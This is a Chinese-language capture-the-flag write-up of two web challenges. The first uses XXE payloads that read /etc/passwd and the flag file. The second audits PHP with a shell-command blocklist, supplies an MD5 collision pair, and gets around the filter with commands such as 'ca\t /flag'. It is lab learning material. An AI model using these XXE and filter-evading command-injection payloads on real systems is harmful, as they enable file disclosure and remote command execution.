Fake XML cookbook
打开题目发现有账号密码登录 先尝试万能密码 但是发现不行 回到题目有xml 去搜索一下
发现xml有注入漏洞
XML 被设计用来传输和存储数据。
HTML 被设计用来显示数据。
XML 指可扩展标记语言(eXtensible Markup Language)。
可扩展标记语言(英语:Extensible Markup Language,简称:XML)是一种标记语言,是从标准通用标记语言(SGML)中简化修改出来的。它主要用到
的有可扩展标记语言、可扩展样式语言(XSL)、XBRL和XPath等
XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,
解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。
XXE原理
有了 XML 实体,关键字 ‘SYSTEM’ 会令 XML 解析器从URI中读取内容,并允许它在 XML 文档中被替换。因此,攻击者可以通过实体将他自定义的值发送
给应用程序,然后让应用程序去呈现。 简单来说,攻击者强制XML解析器去访问攻击者指定的资源内容(可能是系统上本地文件亦或是远程系统上的文件)式语言(XSL)、XBRL和XPath等。
知道这些 就可以构造xxe的payload去试一试
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>123456</password></user>
发现有回显 进行下一步找flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
flag{23211c1d-7a78-4058-aa05-aedb04f7477f}
easy_web
打开题目 没看到什么信息 源代码也没有
抓包 看回显
最后有一句 md5 is funny 上边这一片红的应该是base64转图片
发现是网页上的图片 被骗了
看url上有一串编码 img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= 别的不行 从这里入手看看
看着img这一串像是base64编码 解码看看
解码两次得到这个 看着应该是16进制编码 解一下
解到555.png 利用这个原理 把index.php进行16进制转换然后再两次base64编码
TmprMlJUWTBOalUzT0RKRk56QTJPRGN3
得到这个一面 打开源码 找到代码开始审计
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { #这块需要用到md5强绕过 如果用数组绕过会被置换 因为这里使用了String强转换,数组都被强制转换为了string(5) “Array”
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
payload
$a = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&$b = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
这里抓包放进去
然后在url的cmd传参处传入dir 发现没有flag 查找一下根目录
输入dir%20/ 这里的%20就是空格
发现了flag
直接查找
这里有两种方式 第一种是sort%20/flag 另外一种是 ca\t%20/flag
最后得到flag
总结 这道题比较难的点就是 代码审计 构造MD5碰撞的payload和 dir和sort \ 的利用